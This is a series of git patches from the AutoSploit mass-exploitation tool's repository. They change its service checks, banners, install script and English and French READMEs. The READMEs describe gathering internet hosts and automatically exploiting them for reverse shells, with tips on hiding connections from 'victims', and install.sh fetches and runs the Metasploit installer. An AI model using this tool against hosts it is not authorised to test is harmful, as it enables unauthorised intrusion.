From 4485fa4b9b3521581f2f2bc711f953fae92da5d1 Mon Sep 17 00:00:00 2001 From: Ekultek Date: Fri, 2 Mar 2018 10:46:00 -0600 Subject: [PATCH 01/31] fixes issue #84 and issue #86 --- README.md | 17 +++++++++++++++-- api_calls/zoomeye.py | 2 +- autosploit/main.py | 3 ++- 3 files changed, 18 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index 850d373..e4b81a3 100644 --- a/README.md +++ b/README.md @@ -9,6 +9,14 @@ Receiving back connections on your local machine might not be the best idea from The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent. +# Helpful links + - [Usage](https://github.com/NullArray/AutoSploit#usage) + - [Dependencies](https://github.com/NullArray/AutoSploit#dependencies) + - [User Manual](https://github.com/NullArray/AutoSploit/wiki) + - [Shoutouts](https://github.com/NullArray/AutoSploit#acknowledgements) + - [Development](https://github.com/NullArray/AutoSploit#active-development) + - [Discord server](https://discord.gg/9BeeZQk) + ## Usage Clone the repo. Or deploy via Docker. Details for which can be found [here](https://github.com/NullArray/AutoSploit/tree/master/Docker) @@ -113,10 +121,15 @@ And thanks to [Khast3x](https://github.com/khast3x) for setting up Docker suppor ### Active Development -While this isn't exactly a Beta release it is an early release nonetheless as such the tool might be subject to changes in the future. + +While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. I've been working on the new version of the tool in an open source capacity with the help of a number of developers -that have expressed an interest in doing so. The new version will include extra features such as the ability to load in a custom target and exploit list among many more enhancements. If you would like to keep up to date on all the most recent developments be sure to check out the [Development Branch](https://github.com/NullArray/AutoSploit/tree/dev-beta) +that have expressed an interest in doing so. If you would like to keep up to date on all the most recent developments be sure to check out the [Development Branch](https://github.com/NullArray/AutoSploit/tree/dev-beta). + +If you would like to contribute to the development of this project please be sure to read [CONTRIBUTING.md](https://github.com/NullArray/AutoSploit/blob/master/CONTRIBUTING.md) as it contains our contribution guidelines. + +If you need some help understanding the code, or want to chat with some other AutoSploit community members, feel free to join our [Discord chat](https://discord.gg/9BeeZQk). ### Note diff --git a/api_calls/zoomeye.py b/api_calls/zoomeye.py index 07db818..baf4ccf 100644 --- a/api_calls/zoomeye.py +++ b/api_calls/zoomeye.py @@ -67,7 +67,7 @@ def zoomeye(self): else: headers = { "Authorization": "JWT {}".format(str(token["access_token"])), - "agent": self.user_agent["User-Agent"] + "User-Agent": self.user_agent["User-Agent"] # oops } params = {"query": self.query, "page": "1", "facet": "ipv4"} req = requests.get( diff --git a/autosploit/main.py b/autosploit/main.py index b48ee83..7ab8931 100644 --- a/autosploit/main.py +++ b/autosploit/main.py @@ -27,7 +27,8 @@ def main(): logo() info("welcome to autosploit, give us a little bit while we configure") info("checking for services") - service_names = ("postgresql", "apache") + # according to ps aux, postgre and apache2 are the names of the services + service_names = ("postgres", "apache2") for service in list(service_names): if not check_services(service): choice = prompt("it appears that service {} is not enabled, would you like us to enable it for you[y/N]".format(service)) From e2dd4c34dd9cf0da394bb2246d06eac2f2a1a3e7 Mon Sep 17 00:00:00 2001 From: menkar3 <36867826+menkar3@users.noreply.github.com> Date: Fri, 2 Mar 2018 18:49:20 +0200 Subject: [PATCH 02/31] added check if the services has started (#83) --- autosploit/main.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/autosploit/main.py b/autosploit/main.py index 7ab8931..a42d8a9 100644 --- a/autosploit/main.py +++ b/autosploit/main.py @@ -30,17 +30,17 @@ def main(): # according to ps aux, postgre and apache2 are the names of the services service_names = ("postgres", "apache2") for service in list(service_names): - if not check_services(service): + while not check_services(service): choice = prompt("it appears that service {} is not enabled, would you like us to enable it for you[y/N]".format(service)) if choice.lower().startswith("y"): if "postgre" in service: cmdline("sudo bash {}".format(START_POSTGRESQL_PATH)) else: cmdline("sudo bash {}".format(START_APACHE_PATH)) - info("service started successfully") else: error("service {} is required to be started for autosploit to run, exiting".format(service.title())) sys.exit(1) + info("services started successfully") if len(sys.argv) > 1: info("attempting to load API keys") From 76f4d658713e24031eee108dc015b5ac1b2dbc34 Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 2 Mar 2018 11:07:06 -0600 Subject: [PATCH 03/31] updated the services check --- autosploit/main.py | 40 +++++++++++++++++++++++++++++----------- 1 file changed, 29 insertions(+), 11 deletions(-) diff --git a/autosploit/main.py b/autosploit/main.py index a42d8a9..58e7694 100644 --- a/autosploit/main.py +++ b/autosploit/main.py @@ -1,12 +1,15 @@ import sys +import psutil + from lib.cmdline.cmd import AutoSploitParser from lib.term.terminal import AutoSploitTerminal from lib.output import ( info, warning, error, - prompt + prompt, + misc_info ) from lib.settings import ( logo, @@ -26,32 +29,47 @@ def main(): logo() info("welcome to autosploit, give us a little bit while we configure") - info("checking for services") + misc_info("checking for disabled services") # according to ps aux, postgre and apache2 are the names of the services service_names = ("postgres", "apache2") for service in list(service_names): while not check_services(service): - choice = prompt("it appears that service {} is not enabled, would you like us to enable it for you[y/N]".format(service)) + choice = prompt( + "it appears that service {} is not enabled, would you like us to enable it for you[y/N]".format( + service.title() + ) + ) if choice.lower().startswith("y"): - if "postgre" in service: - cmdline("sudo bash {}".format(START_POSTGRESQL_PATH)) - else: - cmdline("sudo bash {}".format(START_APACHE_PATH)) + try: + if "postgre" in service: + cmdline("sudo bash {}".format(START_POSTGRESQL_PATH)) + else: + cmdline("sudo bash {}".format(START_APACHE_PATH)) + # moving this back because it was funky to see it each run + info("services started successfully") + # this tends to show up when trying to start the services + # I'm not entirely sure why, but this fixes it + except psutil.NoSuchProcess: + pass else: - error("service {} is required to be started for autosploit to run, exiting".format(service.title())) + error( + "service {} is required to be started for autosploit to run successfully (you can do it manually " + "by using the command `sudo service {} start`), exiting".format( + service.title(), service + ) + ) sys.exit(1) - info("services started successfully") if len(sys.argv) > 1: info("attempting to load API keys") loaded_tokens = load_api_keys() AutoSploitParser().parse_provided(opts) - info("checking if there are multiple exploit files") + misc_info("checking if there are multiple exploit files") loaded_exploits = load_exploits(EXPLOIT_FILES_PATH) AutoSploitParser().single_run_args(opts, loaded_tokens, loaded_exploits) else: warning("no arguments have been parsed, defaulting to terminal session. press 99 to quit and help to get help") - info("checking if there are multiple exploit files") + misc_info("checking if there are multiple exploit files") loaded_exploits = load_exploits(EXPLOIT_FILES_PATH) info("attempting to load API keys") loaded_tokens = load_api_keys() From 90254ac6d09db4a6ff228d2a95d05580c8711720 Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 2 Mar 2018 11:07:31 -0600 Subject: [PATCH 04/31] changed the misc_info color so that it isn't as close to the prompt color --- lib/output.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/output.py b/lib/output.py index f31ebb7..5dddebf 100644 --- a/lib/output.py +++ b/lib/output.py @@ -35,7 +35,7 @@ def warning(text): def misc_info(text): print( - "[\033[96mi\033[0m] {}".format( + "[\033[90mi\033[0m] {}".format( text ) ) \ No newline at end of file From 979e1008de36df620eb7579f428fbe264176701c Mon Sep 17 00:00:00 2001 From: ekultek Date: Fri, 2 Mar 2018 12:23:52 -0600 Subject: [PATCH 05/31] minor update to a comment --- lib/banner.py | 18 +++++++++++++++--- lib/cmdline/cmd.py | 4 +++- 2 files changed, 18 insertions(+), 4 deletions(-) diff --git a/lib/banner.py b/lib/banner.py index eba935c..323fe52 100644 --- a/lib/banner.py +++ b/lib/banner.py @@ -1,3 +1,4 @@ +import os import random VERSION = "2.0" @@ -8,9 +9,9 @@ def banner_1(line_sep="#--", space=" " * 30): {sep1}Author : Vector/NullArray | _ |_ _| |_ ___| __|___| |___|_| |_ {sep1}Twitter: @Real__Vector | | | | _| . |__ | . | | . | | _| {sep1}Type : Mass Exploiter |__|__|___|_| |___|_____| _|_|___|_|_| -{sep1}Version: {v_num} |_| +{sep1}Version: {v_num}{spacer} |_| ##############################################\033[0m - """.format(sep1=line_sep, v_num=VERSION, space_sep=space) + """.format(sep1=line_sep, v_num=VERSION, space_sep=space, spacer=" " * 8) return banner @@ -114,4 +115,15 @@ def banner_main(): banner_5, banner_4, banner_3, banner_2, banner_1 ] - return random.choice(banners)() + if os.getenv("Graffiti", False): + return banner_5() + elif os.getenv("AutosploitOG", False): + return banner_1() + elif os.getenv("Nuclear", False): + return banner_4() + elif os.getenv("SploitaSaurusRex", False): + return banner_3() + elif os.getenv("Autosploit2", False): + return banner_2() + else: + return random.choice(banners)() diff --git a/lib/cmdline/cmd.py b/lib/cmdline/cmd.py index 2ac9968..ec0d9ea 100644 --- a/lib/cmdline/cmd.py +++ b/lib/cmdline/cmd.py @@ -19,9 +19,11 @@ def __init__(self): @staticmethod def optparser(): + """ - the options object for our parser + the options function for our parser, it will put everything into play """ + parser = argparse.ArgumentParser( usage="python autosploit.py -[c|z|s|a] -[q] QUERY\n" "{spacer}[-C] WORKSPACE LHOST LPORT [-e]\n" From a62885be8e911f428aeb0134eecfd3bfc6df31b0 Mon Sep 17 00:00:00 2001 From: ekultek Date: Sun, 4 Mar 2018 10:44:35 -0600 Subject: [PATCH 06/31] updated the README and the links --- README.md | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e4b81a3..e1d64b3 100644 --- a/README.md +++ b/README.md @@ -10,9 +10,14 @@ Receiving back connections on your local machine might not be the best idea from The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent. # Helpful links + - [Usage](https://github.com/NullArray/AutoSploit#usage) - [Dependencies](https://github.com/NullArray/AutoSploit#dependencies) - [User Manual](https://github.com/NullArray/AutoSploit/wiki) + - [Extensive usage breakdown](https://github.com/NullArray/AutoSploit/wiki/Usage#usage-options) + - [Screenshots](https://github.com/NullArray/AutoSploit/wiki/Examples-and-images) + - [Reporting bugs/ideas](https://github.com/NullArray/AutoSploit/wiki/Bugs-and-ideas#bugs) + - [Development guidelines](https://github.com/NullArray/AutoSploit/wiki/Development-information#development-of-autosploit) - [Shoutouts](https://github.com/NullArray/AutoSploit#acknowledgements) - [Development](https://github.com/NullArray/AutoSploit#active-development) - [Discord server](https://discord.gg/9BeeZQk) @@ -119,7 +124,6 @@ Special thanks to [Ekultek](https://github.com/Ekultek) without whoms contributi And thanks to [Khast3x](https://github.com/khast3x) for setting up Docker support. - ### Active Development While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. @@ -129,7 +133,9 @@ that have expressed an interest in doing so. If you would like to keep up to dat If you would like to contribute to the development of this project please be sure to read [CONTRIBUTING.md](https://github.com/NullArray/AutoSploit/blob/master/CONTRIBUTING.md) as it contains our contribution guidelines. -If you need some help understanding the code, or want to chat with some other AutoSploit community members, feel free to join our [Discord chat](https://discord.gg/9BeeZQk). +Please, also, be sure to read our [contribution standards](https://github.com/NullArray/AutoSploit/wiki/Development-information#contribution-standards) before sending pull requests + +If you need some help understanding the code, or want to chat with some other AutoSploit community members, feel free to join our [Discord server](https://discord.gg/9BeeZQk). ### Note From b4d9b1f84e29ef85be8eebda5970854b85a66735 Mon Sep 17 00:00:00 2001 From: ekultek Date: Sun, 4 Mar 2018 10:59:43 -0600 Subject: [PATCH 07/31] edited the README for the installation methods --- README.md | 34 ++++++++++++++++++++++++++++++---- 1 file changed, 30 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index e1d64b3..967f25e 100644 --- a/README.md +++ b/README.md @@ -12,6 +12,7 @@ The new version of AutoSploit has a feature that allows you to set a proxy befor # Helpful links - [Usage](https://github.com/NullArray/AutoSploit#usage) + - [Installing](https://github.com/NullArray/AutoSploit#Installation) - [Dependencies](https://github.com/NullArray/AutoSploit#dependencies) - [User Manual](https://github.com/NullArray/AutoSploit/wiki) - [Extensive usage breakdown](https://github.com/NullArray/AutoSploit/wiki/Usage#usage-options) @@ -21,15 +22,40 @@ The new version of AutoSploit has a feature that allows you to set a proxy befor - [Shoutouts](https://github.com/NullArray/AutoSploit#acknowledgements) - [Development](https://github.com/NullArray/AutoSploit#active-development) - [Discord server](https://discord.gg/9BeeZQk) + +# Installation -## Usage +Installing AutoSploit is very simple, you can find the latest stable release [here](https://github.com/NullArray/AutoSploit/releases/tag/2.0). You can also download the master branch as a [zip](https://github.com/NullArray/AutSploit/zipball/master) or [tarball](https://github.com/NullArray/AutSploit/tarball/master) or follow one of the below methods; -Clone the repo. Or deploy via Docker. Details for which can be found [here](https://github.com/NullArray/AutoSploit/tree/master/Docker) +###### Cloning -`git clone https://github.com/NullArray/AutoSploit.git` +```bash +sudo -s << EOF +git clone https://github.com/NullArray/Autosploit.git +cd AutoSploit +pip2 install -r requirements.txt +python2 autosploit.py +EOF +``` -Starting the program with `python autosploit.py` will open an AutoSploit terminal session. The options for which are as follows. +###### Docker +```bash +sudo -s << EOF +git clone https://github.com/NullArray/AutoSploit.git +cd AutoSploit/Docker +docker network create -d bridge haknet +docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres +docker build -t autosploit . +docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploit +EOF +``` + +More information on running Docker can be found [here](https://github.com/NullArray/AutoSploit/tree/master/Docker) + +## Usage + +Starting the program with `python autosploit.py` will open an AutoSploit terminal session. The options for which are as follows. ``` 1. Usage And Legal 2. Gather Hosts From 05995a338baa76fefe37a94dc56591a1f742144e Mon Sep 17 00:00:00 2001 From: Camille <13921610+jesuiscamille@users.noreply.github.com> Date: Tue, 6 Mar 2018 00:04:16 +0100 Subject: [PATCH 08/31] French translation (#93) * Added a helpful link directory * Update README.md * Update README.md * Update README.md * Adding a python version check in main.py: python version must be a 2.x one. * Added french translation ! * fixed markdown error * Damn, these comments really breaks the markdown. Removing them. * removing them all ! * git hell :( * I'll get it ! * fixed line 18 --- README-fr.md | 164 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 164 insertions(+) create mode 100644 README-fr.md diff --git a/README-fr.md b/README-fr.md new file mode 100644 index 0000000..05e28e1 --- /dev/null +++ b/README-fr.md @@ -0,0 +1,164 @@ +# AutoSploit + +Comme vous pouvez l'imaginer au vu du nom de ce projet, AutoSploit automatise l'exploitation d'hôtes distantes connectées à internet. Les adresses des hôtes à attaquer sont collectées automatiquement grâce à l'aide de Shodan, Censys et Zoomeye. Vous pouvez également utiliser vos propres listes de cibles. +Les modules Metasploit disponibles ont été sélectionnés afin de faciliter l'obtention d'exécution de code à distance ( Remote Code Execution, ou RCE ), qui permettent ensuite de créer des sessions terminal inversées ( reverse shell ) ou meterpreter ( via metasploit ). + +**Ne soyez pas stupides** + +Recevoir les connexions de vos victimes directement sur votre ordinateur n'est pas vraiment une bonne idée. Vous devriez considérer l'option de dépenser quelques euros dans un VPS ( ou VPN ). + +La nouvelle version d'AutoSploit permet néanmoins de définir un proxy et un User-Agent personalisé. + +# Liens utiles + + - [Utilisation](https://github.com/NullArray/AutoSploit/README-fr.md#Utilisation) + - [Installation](https://github.com/NullArray/AutoSploit/README-fr.md#Installation) + - [Dépendances](https://github.com/NullArray/AutoSploit/README-fr.md#Dépendances)) + - [Wiki](https://github.com/NullArray/AutoSploit/wiki) + - [Options d'usage extensif](https://github.com/NullArray/AutoSploit/wiki/Usage#usage-options) + - [Captures d'écran](https://github.com/NullArray/AutoSploit/wiki/Examples-and-images) + - [Rapporter un bug, donner une idée](https://github.com/NullArray/AutoSploit/wiki/Bugs-and-ideas#bugs) + - [Lignes directrices du développement](https://github.com/NullArray/AutoSploit/wiki/Development-information#development-of-autosploit) + - [Développement](https://github.com/NullArray/AutoSploit/README-fr.md#Développement) + - [Serveur discord ( en anglais, mais ne vous découragez pas ! )](https://discord.gg/9BeeZQk) + + +# Installation + +Installer AutoSploit est un jeu d'enfant. Vous pouvez trouver la dernière version stable [ici](https://github.com/NullArray/AutoSploit/releases/tag/2.0). Vous pouvez aussi télécharger la branche ``master`` en [zip](https://github.com/NullArray/AutSploit/zipball/master) ou en [tarball](https://github.com/NullArray/AutSploit/tarball/master). Vous pouvez également suivre une des méthodes ci-dessous; + +###### Cloner + +```bash +sudo -s << EOF +git clone https://github.com/NullArray/Autosploit.git +cd AutoSploit +pip2 install -r requirements.txt +python2 autosploit.py +EOF +``` + +###### Docker + +```bash +sudo -s << EOF +git clone https://github.com/NullArray/AutoSploit.git +cd AutoSploit/Docker +docker network create -d bridge haknet +docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres +docker build -t autosploit . +docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploit +EOF +``` + +Plus d'informations sur la façon d'utiliser Docker [ici](https://github.com/NullArray/AutoSploit/tree/master/Docker) + +## Utilisation + +L'ouverture du programme avec `python autosploit.py` devrait ouvrir une session terminal AutoSploit. Les options sont les suivantes ( en anglais ). + +``` +1. Usage And Legal +2. Gather Hosts +3. Custom Hosts +4. Add Single Host +5. View Gathered Hosts +6. Exploit Gathered Hosts +99. Quit +``` + +Sélectionner l'option `2` vous demandra de choisir quel type d'hôtes rechercher. Vous pouvez par exemple rentrer `IIS` ou `Apache`. Ensuite, on vous demandera quel moteurs de recherches doivent être utilisés lors de la recherche. Si tout fontionne correctement, les hôtes collectées seront sauvegardées et utilisables dans le menu d'exploitation ( `Exploit` ) + +Depuis la version 2.0, AutoSploit peut être lancé avec des arguments/drapeaux. Pour en savoir plus, exécutez `python autosploit.py -h`. +Pour référence, voici les options ( en anglais ). + +``` +usage: python autosploit.py -[c|z|s|a] -[q] QUERY + [-C] WORKSPACE LHOST LPORT [-e] + [--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH + [--rand-agent] [--proxy] PROTO://IP:PORT [-P] AGENT + +optional arguments: + -h, --help show this help message and exit + +search engines: + possible search engines to use + + -c, --censys use censys.io as the search engine to gather hosts + -z, --zoomeye use zoomeye.org as the search engine to gather hosts + -s, --shodan use shodan.io as the search engine to gather hosts + -a, --all search all available search engines to gather hosts + +requests: + arguments to edit your requests + + --proxy PROTO://IP:PORT + run behind a proxy while performing the searches + --random-agent use a random HTTP User-Agent header + -P USER-AGENT, --personal-agent USER-AGENT + pass a personal User-Agent to use for HTTP requests + -q QUERY, --query QUERY + pass your search query + +exploits: + arguments to edit your exploits + + -E PATH, --exploit-file PATH + provide a text file to convert into JSON and save for + later use + -C WORKSPACE LHOST LPORT, --config WORKSPACE LHOST LPORT + set the configuration for MSF (IE -C default 127.0.0.1 + 8080) + -e, --exploit start exploiting the already gathered hosts + +misc arguments: + arguments that don't fit anywhere else + + --ruby-exec if you need to run the Ruby executable with MSF use + this + --msf-path MSF-PATH pass the path to your framework if it is not in your + ENV PATH +``` + +# Dépendances + +AutoSploit exige la présence des modules Python2.7 suivants. + +``` +requests +psutil +``` + +Si vous ne les avez pas, vous pouvez les installer avec les commandes ci-dessous ( dans le dossier d'AutoSploit ): + +```bash +pip install requests psutil +``` + +ou + +```bash +pip install -r requirements.txt +``` + +Comme le programme invoque des fonctionalités du Metasploit, vous devez l'avoir installé au préalable. Vous pouvez en obtenir une copie depuis le site de Rapid7 en cliquant [ici](https://www.rapid7.com/products/metasploit/). + +### Développement + +Même si AutoSploit n'est pas vraiment en Béta, il est sujet à des changements dans le futur. + +Si vous souhaitez rester à jour au niveau du développement et obtenir avant tout le monde toutes les super nouvelles fonctionalités, utilisez la [branche de développement](https://github.com/NullArray/AutoSploit/tree/dev-beta). + +Si vous voulez contribuer au développement de ce projet, lisez [CONTRIBUTING.md](https://github.com/NullArray/AutoSploit/blob/master/CONTRIBUTING.md). Ce fichier contient nos lignes directrices de contribution. + +Aussi, lisez nos [standards de contribution](https://github.com/NullArray/AutoSploit/wiki/Development-information#contribution-standards) avant d'envoyer une pull request. + +Si vous souhaitez obtenir de l'aide avec le code, ou juste partager avec les autres membres de la communauté d'AutoSploit, rejoignez-nous sur notre [serveur Discord](https://discord.gg/9BeeZQk). ( Nous ne mordons pas ) + +## Note + +Si vous rencontrez un bug et que vous souhaitez le signaler, [ouvrez un ticket](https://github.com/NullArray/AutoSploit/issues). + +Merci d'avance. + +Traduction par [jesuiscamille](https://github.com/jesuiscamille). J'ai probablement fait des erreurs de conjugaison/orthographe/traduction. N'hésitez pas à juste [ouvrir un ticket](https://github.com/NullArray/AutoSploit/issues), c'est rapide et ça nous encourage :) ! From 8bb2a22898b0a006925683c6f3b72754e0ec7819 Mon Sep 17 00:00:00 2001 From: Aidan Holland Date: Thu, 8 Mar 2018 07:33:58 -0500 Subject: [PATCH 09/31] Added Install script (#85) * Added a helpful link directory * Update README.md * Update README.md * Update README.md * Added install script * Check PATH * Fixed msfconsole PATH * Fixed ubuntu error * Added installation instructions * Use pip2 --- .gitignore | 2 +- CONTRIBUTING.md | 30 ++++++++++++++--------------- README.md | 21 +++++++++++++++------ autosploit.py | 2 +- install.sh | 50 +++++++++++++++++++++++++++++++++++++++++++++++++ 5 files changed, 82 insertions(+), 23 deletions(-) create mode 100755 install.sh diff --git a/.gitignore b/.gitignore index 589e0df..9e972d1 100644 --- a/.gitignore +++ b/.gitignore @@ -4,4 +4,4 @@ api.p hosts.txt secret.p uid.p -etc/tokens/* \ No newline at end of file +etc/tokens/* diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index c209f1f..6a02d39 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -2,11 +2,11 @@ All contributions to AutoSploit are not only welcomed, but highly appreciated, please keep in mind the following while making a pull request: - - Each request should make at least one logical change - - All contributions should be forked from the `dev-beta` branch - - Each request will need to be reviewed before merged, if anything seems weird we will either fix it or ask you to fix it for us - - If you have multiple pushes in one request, please squash them together (or we will before we merge) - - All pull requests that are merged are provided under the same license as the program is, keep the following in mind; +- Each request should make at least one logical change +- All contributions should be forked from the `dev-beta` branch +- Each request will need to be reviewed before merged, if anything seems weird we will either fix it or ask you to fix it for us +- If you have multiple pushes in one request, please squash them together (or we will before we merge) +- All pull requests that are merged are provided under the same license as the program is, keep the following in mind; > By submitting code contributions to AutoSploit via Git pull request or other, checking them into the AutoSploit's source code repository, it is understood (unless you specify otherwise) that you are offering the AutoSploit copyright holders the unlimited, non-exclusive right to reuse, modify, and re-license the code. This is important because the inability to re-license code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them. @@ -14,13 +14,13 @@ All contributions to AutoSploit are not only welcomed, but highly appreciated, p To get started making a contribution please do the following: - - Fork the repository using the fork button - - `git clone https://github.com//AutoSploit.git -b dev-beta` - - Edit the code to your liking - - After editing `git branch && git checkout ` - - Add your commits and comment them - - `git push --set-upstream origin ` - - Open a [pull request](https://github.com/NullArray/AutoSploit/pulls) - - Wait for us to check it out - - Thank you. +- Fork the repository using the fork button +- `git clone https://github.com//AutoSploit.git -b dev-beta` +- Edit the code to your liking +- After editing `git branch && git checkout ` +- Add your commits and comment them +- `git push --set-upstream origin ` +- Open a [pull request](https://github.com/NullArray/AutoSploit/pulls) +- Wait for us to check it out + + Thank you. diff --git a/README.md b/README.md index 967f25e..19f4455 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,6 @@ # AutoSploit -As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. -The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is started +As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is started **Operational Security Consideration** @@ -68,8 +67,7 @@ Starting the program with `python autosploit.py` will open an AutoSploit termina Choosing option `2` will prompt you for a platform specific search query. Enter `IIS` or `Apache` in example and choose a search engine. After doing so the collected hosts will be saved to be used in the `Exploit` component. -As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type `python autosploit.py -h` -to display all the options available to you. I've posted the options below as well for reference. +As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type `python autosploit.py -h` to display all the options available to you. I've posted the options below as well for reference. ``` usage: python autosploit.py -[c|z|s|a] -[q] QUERY @@ -119,6 +117,14 @@ misc arguments: ENV PATH ``` +## Installation + +```bash +git clone https://github.com/NullArray/AutoSploit +cd AutoSploit +chmod +x install.sh +./install.sh +``` ## Dependencies @@ -149,12 +155,15 @@ Special thanks to [Ekultek](https://github.com/Ekultek) without whoms contributi And thanks to [Khast3x](https://github.com/khast3x) for setting up Docker support. +### Active Development + +While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. ### Active Development -While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. +While this isn't exactly a Beta release, AutoSploit 2.0 is an early release nonetheless as such the tool might be subject to changes in the future. -I've been working on the new version of the tool in an open source capacity with the help of a number of developers +I've been working on the new version of the tool in an open source capacity with the help of a number of developers that have expressed an interest in doing so. If you would like to keep up to date on all the most recent developments be sure to check out the [Development Branch](https://github.com/NullArray/AutoSploit/tree/dev-beta). If you would like to contribute to the development of this project please be sure to read [CONTRIBUTING.md](https://github.com/NullArray/AutoSploit/blob/master/CONTRIBUTING.md) as it contains our contribution guidelines. diff --git a/autosploit.py b/autosploit.py index 579923c..13c7eb5 100644 --- a/autosploit.py +++ b/autosploit.py @@ -2,4 +2,4 @@ if __name__ == "__main__": - main() \ No newline at end of file + main() diff --git a/install.sh b/install.sh new file mode 100755 index 0000000..b00b4a5 --- /dev/null +++ b/install.sh @@ -0,0 +1,50 @@ +#!/bin/bash + +echo " ____ __ __ ______ ___ _____ ____ _ ___ ____ ______ "; +echo " / || | || | / \ / ___/| \| | / \| || |"; +echo "| o || | || || ( \_ | o ) | | || | | |"; +echo "| || | ||_| |_|| O |\__ || _/| |___ | O || | |_| |_|"; +echo "| _ || : | | | | |/ \ || | | || || | | | "; +echo "| | || | | | | |\ || | | || || | | | "; +echo "|__|__| \__,_| |__| \___/ \___||__| |_____| \___/|____| |__| "; +echo " "; + +function installDebian() { + sudo apt-get update; + sudo apt-get -y install git python2.7 python-pip postgresql apache2; + pip2 install requests psutil; + installMSF; +} + +function installFedora() { + sudo yum -y install git python-pip; + pip2 install requests psutil; + installMSF; +} + +function installMSF() { + if [[ ! "$(which msfconsole)" = */* ]]; then + curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \ + chmod 755 msfinstall && \ + ./msfinstall; + rm msfinstall; + fi +} + +function install() { + case "$(uname -a)" in + *Debian*|*Ubuntu*) + installDebian; + ;; + *Fedora*) + installFedora; + ;; + *) + echo "Unable to detect Linux flavor..."; + ;; + esac + echo ""; + echo "Installation Complete"; +} + +install; From ce02fb7028b7989abe471446246b5b28c83743b3 Mon Sep 17 00:00:00 2001 From: Evan Lewis Date: Fri, 23 Mar 2018 09:20:28 -0400 Subject: [PATCH 10/31] Added platform detection and support for OSX in service check and start (#101) * Added platform detection and support for OSX in service check and start * Moved brew start command into bash file * Moved apache start to bash file and removed a sudo --- autosploit/main.py | 30 +++++++++++++++++++++++++----- etc/scripts/start_apache_osx.sh | 3 +++ etc/scripts/start_postgre_osx.sh | 3 +++ lib/settings.py | 6 ++++++ 4 files changed, 37 insertions(+), 5 deletions(-) create mode 100644 etc/scripts/start_apache_osx.sh create mode 100644 etc/scripts/start_postgre_osx.sh diff --git a/autosploit/main.py b/autosploit/main.py index 58e7694..83b4ae9 100644 --- a/autosploit/main.py +++ b/autosploit/main.py @@ -1,6 +1,6 @@ import sys - import psutil +import platform from lib.cmdline.cmd import AutoSploitParser from lib.term.terminal import AutoSploitTerminal @@ -18,7 +18,9 @@ cmdline, EXPLOIT_FILES_PATH, START_APACHE_PATH, - START_POSTGRESQL_PATH + START_APACHE_OSX_PATH, + START_POSTGRESQL_PATH, + START_POSTGRESQL_OSX_PATH ) from lib.jsonize import load_exploits @@ -31,7 +33,12 @@ def main(): info("welcome to autosploit, give us a little bit while we configure") misc_info("checking for disabled services") # according to ps aux, postgre and apache2 are the names of the services - service_names = ("postgres", "apache2") + + if platform.system() == "Darwin": + service_names = ("postgres","httpd") + elif platform.system() == "Linux": + service_names = ("postgres", "apache2") + for service in list(service_names): while not check_services(service): choice = prompt( @@ -42,9 +49,22 @@ def main(): if choice.lower().startswith("y"): try: if "postgre" in service: - cmdline("sudo bash {}".format(START_POSTGRESQL_PATH)) + if platform.system() == "Linux": + cmdline("sudo bash {}".format(START_POSTGRESQL_PATH)) + elif platform.system() == "Darwin": + cmdline("sudo bash {}".format(START_POSTGRESQL_OSX_PATH)) + else: + error("Currently not supporting windows") + sys.exit(1) else: - cmdline("sudo bash {}".format(START_APACHE_PATH)) + if platform.system() == "Linux": + cmdline("sudo bash {}".format(START_APACHE_PATH)) + elif platform.system() == "Darwin": + cmdline("sudo bash {}".format(START_APACHE_OSX_PATH)) + else: + error("Currently not supporting windows") + sys.exit(1) + # moving this back because it was funky to see it each run info("services started successfully") # this tends to show up when trying to start the services diff --git a/etc/scripts/start_apache_osx.sh b/etc/scripts/start_apache_osx.sh new file mode 100644 index 0000000..1e74ae7 --- /dev/null +++ b/etc/scripts/start_apache_osx.sh @@ -0,0 +1,3 @@ +#!/bin/bash + +sudo apachectl start diff --git a/etc/scripts/start_postgre_osx.sh b/etc/scripts/start_postgre_osx.sh new file mode 100644 index 0000000..8812af6 --- /dev/null +++ b/etc/scripts/start_postgre_osx.sh @@ -0,0 